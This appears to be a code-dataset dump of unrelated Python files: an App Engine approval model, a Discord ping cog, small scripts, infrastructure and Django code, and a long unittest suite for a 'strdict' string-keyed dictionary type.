        that only stored ``user_key`` into the embedded ``user`` property."""
        message = self._message_class()
        message.created = self.created
        message.ident = self.ident
        if self.user:
            message.user = self.user.to_message()
        elif self.user_key:
            # Legacy path: resolve the key and embed the user in place.
            ent = self.user_key.get()
            if ent:
                message.user = ent.to_message()
                # TODO: Remove this.
                embedded_user = User(**ent.to_dict())
                self.user = embedded_user
                try:
                    self.put()
                except:
                    logging.error("Couldn't migrate legacy user.")
        message.status = self.status
        message.updated = self.updated
        message.domain = self.domain
        try:
            message.form = self.form
        except:
            logging.error("Couldn't decode form.")
        if self.updated_by:
            message.updated_by = self.updated_by.to_message()
        # NOTE(review): message.domain was already assigned above — this
        # second assignment is redundant.
        message.domain = self.domain
        return message
    @classmethod
    def get(cls, user):
        """Return the approval for *user*, matching by key first and then
        falling back to an email match (legacy records)."""
        query = cls.query()
        query = query.filter(cls.user_key == user.key)
        result = query.get()
        if result:
            return result
        query = cls.query()
        query = query.filter(cls.user.email == user.email)
        result = query.get()
        return result
    def update(self, message, updated_by):
        """Replace this approval's form with the one from *message*."""
        return self._update(message.form, updated_by)
    def _update(self, form, updated_by):
        """Store *form* (de-duplicating folders) and record who updated it."""
        self.form = form
        if self.form.folders:
            self.form.folders = list(set(self.form.folders))
        embedded_user = User(**updated_by.to_dict())
        self.updated_by = embedded_user
        self.updated_by_key = updated_by.key
        self.put()
        return self
    @classmethod
    def get_or_create(cls, form, user, send_email=True,
                      created_by=None, status=None):
        """Return the existing approval for *user* (updating it with *form*
        if given) or create a new one."""
        ent = cls.get(user)
        if ent:
            if form:
                ent._update(form, created_by)
            return ent
        return cls.create(form, user, email=send_email,
                          created_by=created_by, status=status)
    @classmethod
    def create(cls, form, user, email=True, created_by=None,
               status=None):
        """Create and store a new approval; optionally notify user and admins."""
        embedded_user = User(**user.to_dict())
        ent = cls(user_key=user.key, user=embedded_user, form=form,
                  status=status)
        if created_by:
            ent.updated_by = User(**created_by.to_dict())
            ent.updated_by_key = created_by.key
        ent.put()
        if email:
            emailer = emails.Emailer(ent)
            emailer.send_created_to_user()
            emailer.send_created_to_admins()
        return ent
    @classmethod
    def create_and_approve(cls, message, user, created_by):
        """Create (or fetch) an approval and mark it approved, without emails."""
        ent = cls.get_or_create(message, user, send_email=False, created_by=created_by)
        ent.approve(created_by, email=False)
        return ent
    def add_folders(self, folders):
        """Grant access to *folders*, skipping ones already present."""
        for folder in folders:
            if folder not in self.form.folders:
                self.form.folders.append(folder)
        self.put()
    def remove_folders(self, folders):
        """Revoke access to any of *folders* currently granted."""
        for folder in folders:
            if folder in self.form.folders:
                self.form.folders.remove(folder)
        self.put()
    @classmethod
    def search(cls, cursor=None, email=None, limit=None):
        """Page through approvals (newest first), optionally filtered by email.

        Returns (results, next_cursor, has_more)."""
        start_cursor = datastore_query.Cursor(urlsafe=cursor) if cursor else None
        query = cls.query()
        if email:
            query = query.order(cls.user.email)
            query = query.filter(cls.user.email == email)
        query = query.order(-cls.created)
        results, next_cursor, has_more = query.fetch_page(
            limit or PER_PAGE, start_cursor=start_cursor)
        return (results, next_cursor, has_more)
    def approve(self, updated_by, email=True):
        """Mark this approval APPROVED and optionally email the user."""
        self.status = messages.Status.APPROVED
        embedded_user = User(**updated_by.to_dict())
        self.updated_by = embedded_user
        self.updated_by_key = updated_by.key
        self.put()
        if email:
            emailer = emails.Emailer(self)
            emailer.send_approved_to_user()
    def reject(self, updated_by, email=True):
        """Mark this approval REJECTED and optionally email the user."""
        self.status = messages.Status.REJECTED
        embedded_user = User(**updated_by.to_dict())
        self.updated_by = embedded_user
        self.updated_by_key = updated_by.key
        self.put()
        if email:
            emailer = emails.Emailer(self)
            emailer.send_rejected_to_user()
    @classmethod
    def approve_multi(cls, approval_messages, updated_by, send_email=False):
        """Approve each approval referenced by *approval_messages*.

        NOTE(review): get_multi is not defined in this class — presumably
        inherited from models.BaseResourceModel; confirm."""
        ents = cls.get_multi(approval_messages)
        for ent in ents:
            ent.approve(updated_by, email=send_email)
        return ents
    @classmethod
    def reject_multi(cls, approval_messages, updated_by, send_email=False):
        """Reject each approval referenced by *approval_messages*."""
        ents = cls.get_multi(approval_messages)
        for ent in ents:
            ent.reject(updated_by, email=send_email)
        return ents
    @classmethod
    def list_approvals_for_user(cls, user):
        """All approvals matching *user* by email or by key (may be empty)."""
        query = cls.query()
        query = query.filter(ndb.OR(
            cls.user.email == user.email,
            cls.user_key == user.key))
        results = query.fetch()
        if results is None:
            return []
        return results
    @classmethod
    def list_approved_folders_for_user(cls, user):
        """The set of folder idents *user* has APPROVED access to."""
        result = cls.get(user)
        approved_folders = set()
        if not result:
            return approved_folders
        if result.status != messages.Status.APPROVED:
            return approved_folders
        approved_folders |= set(result.form.folders)
        return approved_folders
    @classmethod
    def user_has_access(cls, user):
        """True if any of the user's approvals is APPROVED (else None)."""
        ents = cls.list_approvals_for_user(user)
        for ent in ents:
            if ent.status == messages.Status.APPROVED:
                return True
    @property
    def serialized_form(self):
        """The form as a plain dict (via protojson round-trip)."""
        return json.loads(protojson.encode_message(self.form))
    @classmethod
    def to_csv(cls):
        """Export up to 5000 approvals as a CSV string ('' when empty).

        NOTE(review): `unicode` and `del` while iterating `row.keys()` are
        Python 2 idioms; this method would need changes for Python 3."""
        header = cls._csv_header
        ents, _, _ = cls.search(limit=5000)
        rows = []
        for ent in ents:
            encoded_form = None
            try:
                ent.form = ent.form or messages.ApprovalFormMessage()
                encoded_form = json.loads(protojson.encode_message(ent.form))
            except:
                logging.error("Couldn't decode form.")
            row = json.loads(protojson.encode_message(ent.to_message()))
            row['email'] = ent.user.email
            if 'email_opt_in' not in row:
                row['email_opt_in'] = False
            # Drop any columns not in the export header.
            for key in row.keys():
                if key not in header:
                    del row[key]
            if encoded_form:
                row.update(encoded_form)
            for key in row:
                if isinstance(row[key], unicode):
                    row[key] = row[key].encode('utf-8')
            rows.append(row)
        if not rows:
            return ''
        fp = io.BytesIO()
        writer = csv.DictWriter(fp, header)
        writer.writeheader()
        writer.writerows(rows)
        fp.seek(0)
        return fp.read()
    @classmethod
    def decode_form(cls, form_dict):
        """Decode a plain dict back into an ApprovalFormMessage."""
        encoded_message = json.dumps(form_dict)
        return protojson.decode_message(
            messages.ApprovalFormMessage,
            encoded_message)
    @classmethod
    def count(cls):
        """Total number of approval entities."""
        query = cls.query()
        return query.count()
    @property
    def folders(self):
        """Folder entities for every folder ident on the form."""
        from . import folders
        return [folders.Folder.get(ident) for ident in self.form.folders]
| StarcoderdataPython |
9731656 | <reponame>kamira/DiscordBOT
import discord
from discord.ext import commands
from core.classes import Cog_Extension
class Ping(Cog_Extension):
    """Cog exposing a single latency diagnostic command."""

    @commands.command()
    async def ping(self, ctx):
        # bot.latency is in seconds; report it in milliseconds.
        await ctx.send(f"Bot latency: {self.bot.latency * 1000:0.2f} ms")
def setup(bot):
    # discord.py extension entry point: register the cog on load.
    bot.add_cog(Ping(bot))
| StarcoderdataPython |
import math
# Prompt (in Portuguese) for the two legs of a right triangle; the escape
# sequences only set the terminal text color.
co = float(input('\033[34mComprimento do cateto oposto: '))
ca = float(input('\033[35mComprimento do cateto adjacente: '))
# math.hypot computes sqrt(co**2 + ca**2).
hi = math.hypot(co, ca)
print('\033[mA hipotenusa vai medir %.2f' % hi)
| StarcoderdataPython |
4956284 | <gh_stars>0
def test_given_ruby_gems_are_installed(host):
    """Each required gem-provided executable must exist on the host."""
    for executable in ('pod', 'xcpretty', 'bundler', 'fastlane'):
        assert host.exists(executable)
def test_pod_versions(host):
    """Pin the exact tool versions provisioned on the host."""
    expected = [
        ("pod --version", "1.10.1"),
        ("xcpretty --version", "0.3.0"),
        ("bundler --version", "Bundler version 2.1.4"),
        ("gem list | grep fastlane | tail -1", "fastlane (2.166.0"),
    ]
    for command, prefix in expected:
        assert host.run(command).stdout.startswith(prefix)
| StarcoderdataPython |
5060663 | <gh_stars>0
from django.db import models
from materials.models import *
class Supplier(models.Model):
    """A materials supplier: contact name/phone, creation time and the
    material it supplies. Ordered newest-first (see Meta)."""

    s_name = models.CharField(max_length=100)
    s_phone = models.CharField(max_length=14)
    date = models.DateTimeField(auto_now_add=True)
    materials = models.ForeignKey(Material, on_delete=models.CASCADE)

    def save_supplier(self):
        """Persist this supplier."""
        self.save()

    def delete_supplier(self):
        """Remove this supplier from the database."""
        self.delete()

    @classmethod
    def update_supplier(cls, id, new_name):
        """Rename the supplier with primary key *id* and return the new name."""
        cls.objects.filter(pk=id).update(s_name=new_name)
        new_name_object = cls.objects.get(s_name=new_name)
        # BUG FIX: the model field is `s_name`; the original read the
        # nonexistent attribute `name`, which raised AttributeError.
        new_name = new_name_object.s_name
        return new_name

    def __str__(self):
        return f'{self.s_name}'

    class Meta:
        ordering = ['-date']
| StarcoderdataPython |
3243286 | <filename>week6/lecture11/subsets.py
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 21 22:34:32 2016
@author: ericgrimson
"""
def genSubsets(L):
    """Return the power set of L as a list of lists.

    Built recursively: all subsets that omit the last element of L come
    first, followed by the same subsets extended with that element.
    """
    if len(L) == 0:
        # Base case: the only subset of the empty list is the empty list.
        return [[]]
    without_last = genSubsets(L[:-1])
    last = L[-1:]
    with_last = [subset + last for subset in without_last]
    return without_last + with_last
# Demo: enumerate all subsets of a small list.
test = [1, 2, 3, 4]
# Renamed from `super`, which shadowed the `super` builtin.
subsets = genSubsets(test)
| StarcoderdataPython |
3241486 | <reponame>my-aws-org/cloudiscovery<gh_stars>0
from unittest import TestCase
from unittest.mock import MagicMock
from provider.vpc.command import check_ipvpc_inpolicy
class Test(TestCase):
    """Unit tests for check_ipvpc_inpolicy (VPC endpoint / IP policy checks)."""

    def test_check_ipvpc_inpolicy(self):
        """A policy conditioned on aws:sourceVpce must report the matching
        endpoint id when that endpoint belongs to the inspected VPC."""
        vpce = {"VpcEndpoints": [{"VpcEndpointId": "vpce-1234abcd", "VpcId": "dummy"}]}
        policy = """
        {"Version":"2012-10-17","Id":"arn:queue","Statement":
        [{"Effect":"Allow","Principal":"*","Action":"SQS:*","Resource":"arn:queue"},
        {"Effect":"Allow","Principal":"*","Action":"sqs:*","Resource":"arn:queue","Condition":
        {"StringEquals":{"aws:sourceVpce":"vpce-1234abcd"}}}]}
        """
        vpc_options = MagicMock()
        vpc_options.vpc_id = "dummy"
        # Stub the EC2 describe_vpc_endpoints call.
        vpc_options.client.return_value.describe_vpc_endpoints.return_value = vpce
        result = check_ipvpc_inpolicy(policy, vpc_options)
        self.assertTrue("vpce-1234abcd" in result)

    def test_check_vpce_inpolicy(self):
        """A policy conditioned on aws:sourceIp must report the CIDR plus the
        overlapping subnet (id and CIDR) from the inspected VPC."""
        subnets = {
            "Subnets": [
                {
                    "CidrBlock": "10.0.64.0/18",
                    "SubnetId": "subnet-123",
                    "VpcId": "dummy",
                }
            ]
        }
        policy = """
        {"Version":"2012-10-17","Id":"arn:queue","Statement":
        [{"Effect":"Allow","Principal":"*","Action":"SQS:*","Resource":"arn:queue"},
        {"Effect":"Allow","Principal":"*","Action":"sqs:*","Resource":"arn:queue","Condition":
        {"StringEquals":{"aws:sourceIp": "10.0.0.0/16"}}}]}
        """
        vpc_options = MagicMock()
        vpc_options.vpc_id = "dummy"
        # Stub the EC2 describe_subnets call.
        vpc_options.client.return_value.describe_subnets.return_value = subnets
        result = check_ipvpc_inpolicy(policy, vpc_options)
        self.assertTrue("10.0.0.0/16" in result)
        self.assertTrue("10.0.64.0/18" in result)
        self.assertTrue("subnet-123" in result)
| StarcoderdataPython |
122692 | <reponame>tvanslyke/strdict
import collections
import collections.abc
import gc
import random
import string
import sys
import unittest
import weakref
from StringDict import strdict
class DictTest(unittest.TestCase):
def test_invalid_keyword_arguments(self):
class Custom(strdict):
pass
Custom({'': 1})
for invalid in {1 : 2}, dict({1 : 2}):
with self.assertRaises(TypeError):
strdict(**invalid)
with self.assertRaises(TypeError):
strdict({}).update(**invalid)
def test_constructor(self):
self.assertEqual(strdict(), strdict({}))
self.assertIsNot(strdict(), strdict({}))
def test_bool(self):
self.assertIs(not strdict({}), True)
self.assertTrue(strdict({"": None}))
self.assertIs(bool(strdict({})), False)
self.assertIs(bool(strdict({"": 2})), True)
def test_keys(self):
d = strdict({})
self.assertEqual(set(d.keys()), set())
d = strdict({'a': 1, 'b': 2})
k = d.keys()
self.assertEqual(set(k), {'a', 'b'})
self.assertIn('a', k)
self.assertIn('b', k)
self.assertIn('a', d)
self.assertIn('b', d)
self.assertRaises(TypeError, d.keys, None)
self.assertEqual(repr(strdict(a=1).keys()), "['a']")
def test_values(self):
d = strdict({})
self.assertEqual(set(d.values()), set())
d = {'1':2}
self.assertEqual(set(d.values()), {2})
self.assertRaises(TypeError, d.values, None)
self.assertEqual(repr(strdict(a=1).values()), "[1]")
def test_items(self):
d = strdict({})
self.assertEqual(set(d.items()), set())
d = {'1':2}
self.assertEqual(set(d.items()), {('1', 2)})
self.assertRaises(TypeError, d.items, None)
self.assertEqual(repr(strdict(a=1).items()), "[('a', 1)]")
def test_contains(self):
d = strdict({})
self.assertNotIn('a', d)
self.assertFalse('a' in d)
self.assertTrue('a' not in d)
d = {'a': 1, 'b': 2}
self.assertIn('a', d)
self.assertIn('b', d)
self.assertNotIn('c', d)
self.assertRaises(TypeError, d.__contains__)
def test_len(self):
d = strdict({})
self.assertEqual(len(d), 0)
d = {'a': 1, 'b': 2}
self.assertEqual(len(d), 2)
def test_getitem(self):
d = {'a': 1, 'b': 2}
self.assertEqual(d['a'], 1)
self.assertEqual(d['b'], 2)
d['c'] = 3
d['a'] = 4
self.assertEqual(d['c'], 3)
self.assertEqual(d['a'], 4)
del d['b']
self.assertEqual(d, {'a': 4, 'c': 3})
self.assertRaises(TypeError, d.__getitem__)
class Exc(Exception): pass
class BadHash(str):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 0
x = BadHash()
d[x] = 42
x.fail = True
self.assertRaises(Exc, d.__getitem__, x)
def test_clear(self):
d = strdict({'1':1, '2':2, '3':3})
d.clear()
self.assertEqual(d, strdict({}))
self.assertRaises(TypeError, d.clear, None)
def test_update(self):
d = strdict({})
d.update({'1':100})
d.update(strdict({'2':20}))
d.update({'1':1, '2':2, '3':3})
self.assertEqual(d, {'1':1, '2':2, '3':3})
d.update()
self.assertEqual(d, {'1':1, '2':2, '3':3})
self.assertRaises((TypeError, AttributeError), d.update, None)
class SimpleUserDict:
def __init__(self):
self.d = {'1':1, '2':2, '3':3}
def keys(self):
return self.d.keys()
def __getitem__(self, i):
return self.d[i]
def items(self):
return self.d.items()
d.clear()
d.update(SimpleUserDict())
self.assertEqual(d, {'1':1, '2':2, '3':3})
class Exc(Exception): pass
d.clear()
class FailingUserDict:
def items(self):
raise Exc
def __getitem__(self, key):
return key
self.assertRaises(Exc, d.update, FailingUserDict())
class FailingUserDict:
def items(self):
class BogonIter:
def __init__(self):
self.i = 1
def __iter__(self):
return self
def __next__(self):
if self.i:
self.i = 0
return ('a', self.i)
raise Exc
return BogonIter()
def __getitem__(self, key):
return key
self.assertRaises(Exc, d.update, FailingUserDict())
class FailingUserDict:
def keys(self):
class BogonIter:
def __init__(self):
self.i = ord('a')
def __iter__(self):
return self
def __next__(self):
if self.i <= ord('z'):
rtn = chr(self.i)
self.i += 1
return rtn
raise StopIteration
return BogonIter()
def __getitem__(self, key):
raise Exc
self.assertRaises(Exc, d.update, FailingUserDict())
class badseq(object):
def __iter__(self):
return self
def __next__(self):
raise Exc()
self.assertRaises(Exc, strdict({}).update, badseq())
self.assertRaises(ValueError, strdict({}).update, [('1', '2', '3')])
def test_copy(self):
d = strdict({'1': 1, '2': 2, '3': 3})
self.assertIsNot(d.copy(), d)
self.assertEqual(d.copy(), d)
self.assertEqual(d.copy(), {'1': 1, '2': 2, '3': 3})
copy = d.copy()
d['4'] = 4
self.assertNotEqual(copy, d)
self.assertEqual(strdict({}).copy(), strdict({}))
self.assertRaises(TypeError, d.copy, None)
def test_copy_fuzz(self):
for dict_size in [10, 100, 1000, 10000, 100000]:
dict_size = random.randrange(
dict_size // 2, dict_size + dict_size // 2)
with self.subTest(dict_size=dict_size):
d = strdict({})
for i in range(dict_size):
d[str(i)] = i
d2 = d.copy()
self.assertIsNot(d2, d)
self.assertEqual(d, d2)
d2['key'] = 'value'
self.assertNotEqual(d, d2)
self.assertEqual(len(d2), len(d) + 1)
def test_copy_maintains_tracking(self):
class A:
pass
key = A()
for d in (strdict({}), strdict({'a': 1}), strdict({repr(key): 'val'})):
d2 = d.copy()
self.assertEqual(gc.is_tracked(d), gc.is_tracked(d2))
def test_copy_noncompact(self):
# Dicts don't compact themselves on del/pop operations.
# Copy will use a slow merging strategy that produces
# a compacted copy when roughly 33% of dict is a non-used
# keys-space (to optimize memory footprint).
# In this test we want to hit the slow/compacting
# branch of dict.copy() and make sure it works OK.
d = strdict({str(k): k for k in range(1000)})
assert '1' in d
assert '0' in d
for k in range(950):
del d[str(k)]
d2 = d.copy()
self.assertEqual(d2, d)
def test_get(self):
d = strdict({})
self.assertIs(d.get('c'), None)
self.assertEqual(d.get('c', 3), 3)
d = {'a': 1, 'b': 2}
self.assertIs(d.get('c'), None)
self.assertEqual(d.get('c', 3), 3)
self.assertEqual(d.get('a'), 1)
self.assertEqual(d.get('a', 3), 1)
self.assertRaises(TypeError, d.get)
self.assertRaises(TypeError, d.get, None, None, None)
def test_setdefault(self):
# dict.setdefault()
d = strdict({})
self.assertIs(d.setdefault('key0'), None)
d.setdefault('key0', [])
self.assertIs(d.setdefault('key0'), None)
d.setdefault('key', []).append(3)
self.assertEqual(d['key'][0], 3)
d.setdefault('key', []).append(4)
self.assertEqual(len(d['key']), 2)
self.assertRaises(TypeError, d.setdefault)
class Exc(Exception): pass
class BadHash(str):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 42
x = BadHash()
d[x] = 42
x.fail = True
try:
d.setdefault(x, [])
except Exc:
self.fail("setdefault() called custom hash, but should have used str.__hash__()")
def test_setdefault_atomic(self):
# Issue #13521: setdefault() calls __hash__ and __eq__ only once.
class Hashed(str):
def __init__(self, *args, **kwargs):
self.hash_count = 0
self.eq_count = 0
def __hash__(self):
self.hash_count += 1
return 42
def __eq__(self, other):
self.eq_count += 1
return super(Hashed, self).__eq__(other)
hashed1 = Hashed('s')
y = strdict({hashed1: 5})
hashed2 = Hashed('r')
y.setdefault(hashed2, [])
self.assertEqual(hashed1.hash_count, 1)
self.assertEqual(hashed2.hash_count, 0)
self.assertEqual(hashed1.eq_count + hashed2.eq_count, 0)
def test_setitem_atomic_at_resize(self):
class Hashed(str):
def __init__(self, *args, **kwargs):
self.hash_count = 0
self.eq_count = 0
def __hash__(self):
self.hash_count += 1
return 42
def __eq__(self, other):
self.eq_count += 1
return super(Hashed, self).__eq__(other)
hashed1 = Hashed('s')
# 5 items
y = strdict({hashed1: 5, '0': 0, '1': 1, '2': 2, '3': 3})
hashed2 = Hashed('r')
# 6th item forces a resize
y[hashed2] = []
self.assertEqual(hashed1.hash_count, 1)
self.assertEqual(hashed2.hash_count, 0)
self.assertEqual(hashed1.eq_count + hashed2.eq_count, 0)
def test_popitem(self):
# dict.popitem()
for copymode in -1, +1:
# -1: b has same structure as a
# +1: b is a.copy()
for log2size in range(12):
size = 2**log2size
a = strdict({})
b = strdict({})
for i in range(size):
a[repr(i)] = str(i)
if copymode < 0:
b[repr(i)] = repr(i)
if copymode > 0:
b = a.copy()
for i in range(size):
ka, va = ta = a.popitem()
self.assertEqual(va, ka)
kb, vb = tb = b.popitem()
self.assertEqual(vb, kb)
self.assertFalse(copymode < 0 and ta != tb)
self.assertFalse(a)
self.assertFalse(b)
d = strdict({})
self.assertRaises(KeyError, d.popitem)
def test_pop(self):
# Tests for pop with specified key
d = strdict({})
k, v = 'abc', 'def'
d[k] = v
self.assertRaises(KeyError, d.pop, 'ghi')
self.assertEqual(d.pop(k), v)
self.assertEqual(len(d), 0)
self.assertRaises(KeyError, d.pop, k)
self.assertEqual(d.pop(k, v), v)
d[k] = v
self.assertEqual(d.pop(k, 1), v)
self.assertRaises(TypeError, d.pop)
class Exc(Exception): pass
class BadHash(str):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 42
x = BadHash()
d[x] = 42
x.fail = True
try:
d.pop(x)
except Exc:
self.fail("pop() called custom hash, but should have used str.__hash__()")
def test_mutating_lookup(self):
# changing dict during a lookup (issue #14417)
class NastyKey(bytearray):
mutate_dict = None
def __init__(self, *args, **kwargs):
super(NastyKey, self).__init__(*args, **kwargs)
def __hash__(self):
if NastyKey.mutate_dict:
mydict, key = NastyKey.mutate_dict
NastyKey.mutate_dict = None
del mydict[key]
return 0
key1 = NastyKey([1])
key2 = NastyKey([2])
d = {key1: 1}
NastyKey.mutate_dict = (d, key1)
d[key2] = 2
self.assertEqual(d, {key2: 2})
def test_repr(self):
d = strdict({})
self.assertEqual(repr(d), "strdict({})")
d['1'] = 2
self.assertEqual(repr(d), "strdict({'1': 2})")
d = strdict({})
d['1'] = d
self.assertEqual(repr(d), "strdict({'1': strdict({...})})")
class Exc(Exception): pass
class BadRepr(object):
def __repr__(self):
raise Exc()
d = {1: BadRepr()}
self.assertRaises(Exc, repr, d)
def test_repr_deep(self):
d = strdict({})
for i in range(sys.getrecursionlimit() + 100):
d = strdict({'1': d})
self.assertRaises(RecursionError, repr, d)
def test_eq(self):
self.assertEqual(strdict({}), strdict({}))
self.assertEqual(strdict({'1': 2}), {'1': 2})
self.assertEqual({'1': 2}, strdict({'1': 2}))
self.assertEqual(strdict({'1': 2}), strdict({'1': 2}))
class Exc(Exception): pass
class BadCmp(object):
def __eq__(self, other):
raise Exc()
d1 = {'1': BadCmp()}
d2 = {'1': 1}
with self.assertRaises(Exc):
d1 == d2
def test_keys_contained(self):
self.helper_keys_contained(lambda x: set(x.keys()))
self.helper_keys_contained(lambda x: set(x.items()))
def helper_keys_contained(self, fn):
# Test rich comparisons against dict key views, which should behave the
# same as sets.
empty = fn(strdict())
empty2 = fn(strdict())
smaller = fn(strdict({'1':1, '2':2}))
larger = fn(strdict({'1':1, '2':2, '3':3}))
larger2 = fn(strdict({'1':1, '2':2, '3':3}))
larger3 = fn(strdict({'4':1, '2':2, '3':3}))
self.assertTrue(smaller < larger)
self.assertTrue(smaller <= larger)
self.assertTrue(larger > smaller)
self.assertTrue(larger >= smaller)
self.assertFalse(smaller >= larger)
self.assertFalse(smaller > larger)
self.assertFalse(larger <= smaller)
self.assertFalse(larger < smaller)
self.assertFalse(smaller < larger3)
self.assertFalse(smaller <= larger3)
self.assertFalse(larger3 > smaller)
self.assertFalse(larger3 >= smaller)
# Inequality strictness
self.assertTrue(larger2 >= larger)
self.assertTrue(larger2 <= larger)
self.assertFalse(larger2 > larger)
self.assertFalse(larger2 < larger)
self.assertTrue(larger == larger2)
self.assertTrue(smaller != larger)
# There is an optimization on the zero-element case.
self.assertTrue(empty == empty2)
self.assertFalse(empty != empty2)
self.assertFalse(empty == smaller)
self.assertTrue(empty != smaller)
# With the same size, an elementwise compare happens
self.assertTrue(larger != larger3)
self.assertFalse(larger == larger3)
def test_dictview_set_operations_on_keys(self):
k1 = set({1:1, 2:2}.keys())
k2 = set({1:1, 2:2, 3:3}.keys())
k3 = set({4:4}.keys())
self.assertEqual(k1 - k2, set())
self.assertEqual(k1 - k3, {1,2})
self.assertEqual(k2 - k1, {3})
self.assertEqual(k3 - k1, {4})
self.assertEqual(k1 & k2, {1,2})
self.assertEqual(k1 & k3, set())
self.assertEqual(k1 | k2, {1,2,3})
self.assertEqual(k1 ^ k2, {3})
self.assertEqual(k1 ^ k3, {1,2,4})
def test_dictview_set_operations_on_items(self):
    # Same set algebra as for key views, but elements are (key, value)
    # tuples taken from the item view.
    k1 = set({1:1, 2:2}.items())
    k2 = set({1:1, 2:2, 3:3}.items())
    k3 = set({4:4}.items())
    self.assertEqual(k1 - k2, set())
    self.assertEqual(k1 - k3, {(1,1), (2,2)})
    self.assertEqual(k2 - k1, {(3,3)})
    self.assertEqual(k3 - k1, {(4,4)})
    self.assertEqual(k1 & k2, {(1,1), (2,2)})
    self.assertEqual(k1 & k3, set())
    self.assertEqual(k1 | k2, {(1,1), (2,2), (3,3)})
    self.assertEqual(k1 ^ k2, {(3,3)})
    self.assertEqual(k1 ^ k3, {(1,1), (2,2), (4,4)})
def test_missing(self):
    """__missing__ must be looked up on the type, not the instance,
    and the base dict type must not define it at all."""
    # (Removed an unused `from inspect import currentframe, getframeinfo`
    # that was never referenced anywhere in this test.)
    # Make sure dict doesn't have a __missing__ method
    self.assertFalse(hasattr(strdict, "__missing__"))
    self.assertFalse(hasattr(strdict({}), "__missing__"))

    class D(strdict):
        def __init__(self, *args, **kwargs):
            super(D, self).__init__(*args, **kwargs)
        def __missing__(self, key):
            return 42
    d = D({'1': 2, '3': 4})
    self.assertEqual(d['1'], 2)
    self.assertEqual(d['3'], 4)
    self.assertNotIn('2', d)
    self.assertNotIn('2', d.keys())
    # Lookup of an absent key falls back to type-level __missing__.
    self.assertEqual(d['2'], 42)

    e = strdict()
    with self.assertRaises(KeyError) as c:
        e['42']
    self.assertEqual(c.exception.args, ('42',))

    class F(strdict):
        def __init__(self):
            # An instance variable __missing__ should have no effect
            self.__missing__ = lambda key: None
    f = F()
    with self.assertRaises(KeyError) as c:
        f['42']
    self.assertEqual(c.exception.args, ('42',))

    class G(strdict):
        pass
    g = G()
    with self.assertRaises(KeyError) as c:
        g['42']
    self.assertEqual(c.exception.args, ('42',))
def test_tuple_keyerror(self):
    # SF #1576657: the missing key itself must be carried in KeyError.args.
    # The context manager result `c` was captured but never checked;
    # assert on it like the sibling tests do.
    d = strdict({})
    with self.assertRaises(KeyError) as c:
        d['1']
    self.assertEqual(c.exception.args, ('1',))
def test_resize1(self):
    # Dict resizing bug, found by <NAME> in 2.2 CVS development.
    # This version got an assert failure in debug build, infinite loop in
    # release build.  Unfortunately, provoking this kind of stuff requires
    # a mix of inserts and deletes hitting exactly the right hash codes in
    # exactly the right order, and I can't think of a randomized approach
    # that would be *likely* to hit a failing case in reasonable time.
    # NOTE: the exact insert/delete sequence below is load-bearing;
    # do not "simplify" it.
    d = strdict({})
    for i in range(5):
        d[chr(i)] = i
    for i in range(5):
        del d[chr(i)]
    for i in range(5, 9):  # i==8 was the problem
        d[chr(i)] = i
def test_resize2(self):
    # Another dict resizing bug (SF bug #1456209).
    # This caused Segmentation faults or Illegal instructions.
    # All X instances collide on hash 5; __eq__ clears the dict while a
    # resize-triggered probe is comparing keys, exercising use-after-free.
    class X(str):
        def __hash__(self):
            return 5
        def __eq__(self, other):
            if resizing:
                d.clear()
            return False
    d = strdict({})
    resizing = False
    d[X()] = 1
    d[X()] = 2
    d[X()] = 3
    d[X()] = 4
    d[X()] = 5
    # now trigger a resize
    resizing = True
    d['9'] = 6
def test_resize_copy_and_deletion(self):
    # test adding a bunch of items and then deleting them
    # A copy taken while empty must stay independent, and equality must
    # track the live dict through growth, shrinkage and refill.
    keys = [str(i) for i in range(1000)]
    d = strdict()
    dcpy = d.copy()
    self.assertEqual(d, dcpy)
    for k in keys:
        d[k] = int(int(k) ** 2)
    self.assertEqual(len(d), len(keys))
    self.assertNotEqual(d, dcpy)
    for k in keys[30:]:
        del d[k]
    self.assertNotEqual(d, dcpy)
    self.assertNotEqual(len(d), len(keys))
    # Refill the copy in reverse insertion order; equality must not
    # depend on insertion order.
    for k in (keys[:30])[::-1]:
        dcpy[k] = int(int(k) ** 2)
    self.assertEqual(d, dcpy)
def _not_tracked(self, t):
    # Assert that the GC does not (or no longer) tracks object t.
    # Nested containers can take several collections to untrack
    gc.collect()
    gc.collect()
    self.assertFalse(gc.is_tracked(t), t)
def _tracked(self, t):
    # Assert that t is GC-tracked both before and after collections
    # (i.e. it is never spuriously untracked).
    self.assertTrue(gc.is_tracked(t), t)
    gc.collect()
    gc.collect()
    self.assertTrue(gc.is_tracked(t), t)
def check_reentrant_insertion(self, mutate):
    # This object will trigger mutation of the dict when replaced
    # by another value. Note this relies on refcounting: the test
    # won't achieve its purpose on fully-GCed Python implementations.
    class Mutating:
        def __del__(self):
            mutate(d)
    d = strdict({k: Mutating() for k in 'abcdefghijklmnopqr'})
    # Each assignment drops a Mutating value, whose __del__ re-enters
    # the dict via mutate() while the insertion is in progress.
    for k in d.keys():
        d[k] = k
def test_reentrant_insertion(self):
    # Reentrant insertion shouldn't crash (see issue #22653)
    # Three mutation flavors: plain insert, update-then-clear, and
    # popitem-until-empty.
    def mutate(d):
        d['b'] = 5
    self.check_reentrant_insertion(mutate)

    def mutate(d):
        d.update(self.__dict__)
        d.clear()
    self.check_reentrant_insertion(mutate)

    def mutate(d):
        while d:
            d.popitem()
    self.check_reentrant_insertion(mutate)
def test_equal_operator_modifying_operand(self):
    # test fix for seg fault reported in issue 27945 part 3.
    # X.__eq__ clears one dict and X.__del__ clears the other, so both
    # operands mutate while `==` is iterating them.
    dict_a = strdict()
    dict_b = strdict()
    class X(str):
        def __del__(self):
            dict_b.clear()
        def __eq__(self, other):
            dict_a.clear()
            return True
        def __hash__(self):
            return 0
    dict_a[X('')] = 0
    dict_b[X('')] = X('')
    self.assertTrue(dict_a == dict_b)
def test_dictitems_contains_use_after_free(self):
class X:
def __eq__(self, other):
d.clear()
return NotImplemented
d = strdict({'0': set()})
('0', X()) in d.items()
def test_equality_inequality(self):
    # == and != must stay consistent opposites through inserts, clears,
    # re-inserts, deletions and value changes.
    a = strdict()
    b = strdict()
    keys = [
        ("a", 1),
        ("b", 2),
        ("c", 3),
        ("d", 4),
        ("e", 5),
        ("f", 6),
        ("asdffdsaasdf", 7),
        ("000000000000000000000000", 8),
        ("asdfdssebsbrssr", "asdfadsaf")
    ]
    a.update(keys)
